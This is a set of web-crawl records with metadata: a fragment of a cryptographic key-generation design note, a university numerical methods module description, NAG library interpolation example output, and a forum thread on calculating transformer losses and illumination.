a Certificate Authority) wants to be able to contribute randomness to the key generation process in such a way that:\n\n• The co-operating party can verify that the randomness they contributed was used in the generation of the public key.\n• If the generator of the key-pair uses a strong random number generator, the co-operating party gains no advantage in being able to break the key pair from having contributed.\n• If the generator of the key-pair uses a weak random number generator and the generator used by the co-operating party is strong, the resulting key is strong against an attack by any party other than the co-operating party.\n\nThe key pair combination property may also be used to provide an enhanced version of the hierarchical key generation scheme described above." ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.9240066,"math_prob":0.93080705,"size":6731,"snap":"2020-10-2020-16","text_gpt3_token_len":1437,"char_repetition_ratio":0.1272484,"word_repetition_ratio":0.011666667,"special_character_ratio":0.20517011,"punctuation_ratio":0.0651341,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.98074424,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-02-23T01:17:36Z\",\"WARC-Record-ID\":\"<urn:uuid:3b956a45-6d0e-44af-9871-1037bb2eadd3>\",\"Content-Length\":\"12869\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:b9c13edb-12bb-4cb2-af2a-abb2606e592c>\",\"WARC-Concurrent-To\":\"<urn:uuid:7fc356f6-9c89-4da7-9e64-901921247dfb>\",\"WARC-IP-Address\":\"96.237.138.82\",\"WARC-Target-URI\":\"https://mathmesh.com/Documentation/Design/mesh-13-meta-dh.html\",\"WARC-Payload-Digest\":\"sha1:SKVGR4GGB6KEU7D75TAZQ32OZ5XZBOTJ\",\"WARC-Block-Digest\":\"sha1:E4HHEDBMMQ2AN3CYPDIG6DXCH6NEP6E3\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-10/CC-MAIN-2020-10_segments_1581875145742.20_warc_CC-MAIN-20200223001555-20200223031555-00445.warc.gz\"}"}
https://webprod3.leeds.ac.uk/catalogue/dynmodules.asp?Y=202122&M=MATH-3476
[ "# 2021/22 Undergraduate Module Catalogue\n\n## MATH3476 Numerical Methods\n\n### 15 creditsClass Size: 100\n\nModule manager: Adrian Barker\nEmail: [email protected]\n\nTaught: Semester 1 (Sep to Jan) View Timetable\n\nYear running 2021/22\n\n### Pre-requisites\n\n COMP2421 Numerical Computation MATH2600 Numerical Analysis MATH2601 Numerical Analysis with Computation\n\nModule replaces\n\nMATH3474\n\nThis module is not approved as a discovery module\n\n### Module summary\n\nOrdinary and partial differential equations (ODEs and PDEs) are ubiquitous in the modelling of real problems arising in science, engineering and economics. However, only rarely can ODEs and PDEs be solved exactly in mathematical terms, and so approximate methods of solution are of paramount importance.The basic idea employed in this course is that of discretizing the original continuous problem to obtain a discrete problem, or system of equations, that may be solved with the aid of a computer.This course introduces the basic ideas underlying approximation and its application, via finite differences, to the solution of ODEs and PDEs. As part of the approximation process, numerical linear algebraic techniques are developed in order to provide calculable solutions to the discrete equations.\n\n### Objectives\n\nLearning outcomes\nOn completion of this module, students should be able to:\n- work independently to acquire an understanding of the relevant background theory;\n- work collaboratively to apply theory in solving problems;\n- interpolate periodic and non-periodic data on a finite 1-D interval using minimax, Chebyshev and forced-oscillation approximation techniques;\n- understand the Runge phenomenon; understand spectral accuracy; approximate partial derivatives by differences in both 1-and 2-D to prespecified orders and accuracy using both series and operator methods;\n- set up linear systems of simultaneous algebraic equations to solve 1- and 2-D elliptic BVPs; and\n- solve such equations by a variety of direct and iterative methods; understand the theory underlying such methods.\n\n### Syllabus\n\nApproximation Theory - Lagrange interpolation; Newton divided differences; interpolation errors; Weierstrass' theorem; minimax approximations; Chebyshev equioscillation and de la Vallee-Poussin theorems; Chebyshev polynomials; least-squares, near-minimax, interpolation; forced-oscillation approximations; spectrally accurate evaluation of Fourier co-efficients.\nNumerical Differentiation - 1-D finite differences of arbitrary order and accuracy; FD operators; implicit FD formulae; regular and irregular meshes; molecules and stencils; 2-D FD formulae; first- and higher-order approximations to Laplacian; Poisson equation and Mehrstellenverfahren; high-order multidimensional derivatives.\nNumerical Linear Algebra - matrix and vector norms; spectral radius; diagonal dominance; Gerschgorin's and Bauer's theorems; sparse systems; tridiagonal systems and Cholesky factorisation; Jacobi, Gauss-siedel and SOR iteration; theoretical convergence estimates; optimum over-relaxation; theoretical optimum for 2-cyclic matrices.\nIf time allows, solution of elliptic Dirichlet and Neumann BVPs; chessboard enumeration; Richardson extrapolation.\n\n### Teaching methods\n\n Delivery type Number Length hours Student hours Practical 22 1.00 22.00 Independent online learning hours 55.00 Private study hours 73.00 Total Contact hours 22.00 Total hours (100hr per 10 credits) 150.00\n\n### Opportunities for Formative Feedback\n\nInteraction with 
module manager through regular practical classes. Assessment of success on example sheets.\n\n### Methods of assessment\n\nExams\n Exam type Exam duration % of formal assessment Standard exam (closed essays, MCQs etc) 2 hr 00 mins 100.00 Total percentage (Assessment Exams) 100.00\n\nNormally resits will be assessed by the same methodology as the first attempt, unless otherwise stated" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.8224248,"math_prob":0.8276469,"size":4189,"snap":"2022-40-2023-06","text_gpt3_token_len":949,"char_repetition_ratio":0.104898445,"word_repetition_ratio":0.0,"special_character_ratio":0.1971831,"punctuation_ratio":0.13043478,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99195594,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-09-30T09:55:26Z\",\"WARC-Record-ID\":\"<urn:uuid:360db06b-a9d4-40db-8a03-9983070a1c0e>\",\"Content-Length\":\"12317\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:13ed9ba5-a36e-4a92-b390-aef831c7ae4a>\",\"WARC-Concurrent-To\":\"<urn:uuid:ab8e417e-7a36-474f-8fdd-de5f4344f2c1>\",\"WARC-IP-Address\":\"13.107.246.40\",\"WARC-Target-URI\":\"https://webprod3.leeds.ac.uk/catalogue/dynmodules.asp?Y=202122&M=MATH-3476\",\"WARC-Payload-Digest\":\"sha1:ZV6K5LIYJ4W7FXKOD2CPJDGRNZU56BRE\",\"WARC-Block-Digest\":\"sha1:35SEFLYMCEWJGDME6CX5GULEWBNB3NOF\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-40/CC-MAIN-2022-40_segments_1664030335448.34_warc_CC-MAIN-20220930082656-20220930112656-00437.warc.gz\"}"}
https://www.nag.com/numeric/nl/nagdoc_latest/examples/baseresults/e01aa_a1w_fe.r.html
[ "NAG Library Manual, Mark 27.2\nInterfaces:  FL   CL   CPP   AD\n```\nE01AA_A1W_F Example Program Results\n\nInterpolation point = 0.28000\n\nFunction value at interpolation point = -0.83591\n\nDerivatives calculated: First order adjoints\nComputational mode : algorithmic\n\nDerivatives of fitted value w.r.t. x values:\nj d/dx(j)\n1 -0.12035E-01\n2 -0.15767E+00\n3 -0.82321E-02\n4 -0.15188E+01\n5 0.89665E+00\n6 -0.37061E+00\n```" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.538181,"math_prob":0.98109406,"size":336,"snap":"2021-21-2021-25","text_gpt3_token_len":123,"char_repetition_ratio":0.11746988,"word_repetition_ratio":0.0,"special_character_ratio":0.43452382,"punctuation_ratio":0.1891892,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9708106,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-06-13T13:58:53Z\",\"WARC-Record-ID\":\"<urn:uuid:b0e7f4d7-bc3c-4b09-9e55-069a90d2e788>\",\"Content-Length\":\"2218\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:28d83da0-530e-4e9f-b8f8-7a5203217b46>\",\"WARC-Concurrent-To\":\"<urn:uuid:e699e027-50a2-49ab-ab59-ded44f740adc>\",\"WARC-IP-Address\":\"78.129.168.4\",\"WARC-Target-URI\":\"https://www.nag.com/numeric/nl/nagdoc_latest/examples/baseresults/e01aa_a1w_fe.r.html\",\"WARC-Payload-Digest\":\"sha1:ER7EDSEDMFFQQ2X4ECYMAKQDQJ2BCLD4\",\"WARC-Block-Digest\":\"sha1:VUERBLL3YNE67E4V4NB3447XPXCODICI\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-25/CC-MAIN-2021-25_segments_1623487608856.6_warc_CC-MAIN-20210613131257-20210613161257-00514.warc.gz\"}"}
https://engineering.electrical-equipment.org/forum/general-discussion/transformer-losses
[ "# transformer losses\n\nViewing 8 posts - 1 through 8 (of 8 total)\n• Author\nPosts\n• #10464\n\nhi can u help me @ transformer (3 phase) losses any formulae or thumb rules.if the transformer is 50 % loaded there are some losses but how to calculate? how we to calculate % of transformer loading?\n\n#12101\n\nHi,\n\nLook for Transformer Test report. It will have Iron losses which will remain almost constant through out the loading cycle. Then look for efficiency on the name plate. This corresponds to full load. Now calculate the full load losses. Example if 1000KVA transformer efficiency is 98% then the losses are 2% i.e. 20KW. If the Iron Losses is indicated as 2KW, then the copper losses are 18KW. Now the copper losses are proportional to square of current. Therefore at 50% load copperlosses will be 0.5 sqare times the full load copper loss. i.e. 0.25X18=4.5KW. Therefore at 50% load you will have 6.5KW losses. If you dont know what is the Iron losses of the transformer, then see the noload power consumption of the transformer, it will  be very close to iron losses.\n\n#12104\n\nanil i agree with you.\n\nBut i think to know the full load losses you have to go for open ckt test (i.e. iron losses) and short ckt test (i.e copper losses).then to know tfransformer loss at any load= iron loss + copper loss at that load.\n\ne.g.  copper loss at 50% load = ( 50% 0f full load current)2*R\n\n=(I/2)2*R\n\n=I2R/4\n\n#12108\n\nTransformer losses are found by short circuit test and open circuit test.\n\n#12113\n\ni want to calcute my home electricity load and also want to know illuminus calclations formuly any bdy hlp me plz?\n\n#12120\n\namit kulkarni said:\n\nhi can u help me @ transformer (3 phase) losses any formulae or thumb rules.if the transformer is 50 % loaded there are some losses but how to calculate? how we to calculate % of transformer loading?\n\nDear Amit ;\n\nthere are 2 kinds of losses : Iron Losse & Cupper losse, the iron loose is not affected by the load, but the cupper load si affected by the load.\n\nNormally, on the name plate of any transformer there's a percentage value ” i % ” that's the percentage current of the nominal current for the iron losse, so, if we have it we can calculate the iron losse. and also on the name plate there is a value of cupper losse on full load in ” watt “, by whici we can calculate the ” R ” of the transformer then accordingly the load's current and the value of R we can calculate the cupper losse, notint taht the formula by which we calculate the ” R ” of any transformer is : R = Pcu/3 . 
In2  ; where :\n\n– Pcu : is the full load cupper losse\n\n– In2 : is the square on the transformer nominal current\n\nRegards.\n\n#12140\n\ni want\n\nto calcute my home electricity load and also want to know illuminus calclations\n\nformuly any bdy hlp me plz?\n\nHello Dear mhrnaseer,\n\nammeter.\n\nMultiply load current to standard voltages which are usually\n\nIllumination is defined as “the emitted luminous flux per\n\nunit area is called illumination”.\n\nMathematically\n\nE=Φ/A    (lux).\n\nIllumination at any surface can be calculated by two laws:\n\n1) inverse square law\n\n2) Lambert’s law\n\n1)inverse square law tells that the illumination of a\n\nsurface is inversely proportional to the square\n\nof  the distance of the surface\n\nfrom the source.\n\ni.e   E «1/d^2\n\n2) Lambert’s law tells that illumination is directly\n\nproportional to cosine of the angle made by the normal to the illuminated\n\nsurface with the direction of the incident flux.\n\ni.e E  « I cosΘ   where I is  luminous intensity.\n\ncombining the both laws we get\n\nE «(I/d^2)cosΘ\n\nOr\n\nE=(I/d^2)cosΘ\n\n#12172\n\namit kulkarni said:\n\nhi can u help me @ transformer (3 phase) losses any formulae or thumb rules.if the transformer is 50 % loaded there are some losses but how to calculate? how we to calculate % of transformer loading?\n\nWE HAVE TWO TYPES OF LOSSES IN TRANSFORMER…..ie….iron loss and copper loss…one which will be constant for every loads…and the one which vary with bthe loading conditions respectively…..iron loss occurs all the time whether the transformer is loaded or unloaded and hence also called constant loss…and the other occurs only when it is loaded…and vary with the loads..and hence also called variable loss….an open circuit test in which rated voltage is applied to the primary winding and secondary winding is open circuited(test will be carried out in the low voltage side)is used for determining ironloss…..here the wattmeter gives the iron loss…bcos copper loss at no load conduction is negligible…..and the copper loss could be datemined by short circuit test in which rated current is made to flow through the primary winding and secondary winding will be short circuited….here the wattmeter reading gives full load copper loss…and to determine copper loss at  x(FULL LOAD) the below formula can be used…\n\nW(cu,xfl)=X*X*W(cu,fl)    where W(cu,fl) is the full load copper loss……                                                                                                              and the total transformer loss will be iron loss+copper loss\n\nViewing 8 posts - 1 through 8 (of 8 total)\n• You must be logged in to reply to this topic." ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.8696742,"math_prob":0.9387329,"size":5370,"snap":"2021-43-2021-49","text_gpt3_token_len":1395,"char_repetition_ratio":0.15970927,"word_repetition_ratio":0.15318231,"special_character_ratio":0.25642458,"punctuation_ratio":0.09686347,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9957704,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-10-17T10:30:21Z\",\"WARC-Record-ID\":\"<urn:uuid:811eaa15-8d6a-4ec7-ab49-cba93eaed680>\",\"Content-Length\":\"81253\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:f0fc8df4-a925-4cd9-b06f-86cd6cdb19b2>\",\"WARC-Concurrent-To\":\"<urn:uuid:0ece14c8-43c8-4d7f-8c4c-23b8e2ad7855>\",\"WARC-IP-Address\":\"54.36.91.62\",\"WARC-Target-URI\":\"https://engineering.electrical-equipment.org/forum/general-discussion/transformer-losses\",\"WARC-Payload-Digest\":\"sha1:G2VFNVSHGYPKH4M3DSXNPUL4NVRMHCM6\",\"WARC-Block-Digest\":\"sha1:F4HUGH6NHQCT3MCY6CG6ZCMSS3ECPY73\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-43/CC-MAIN-2021-43_segments_1634323585171.16_warc_CC-MAIN-20211017082600-20211017112600-00324.warc.gz\"}"}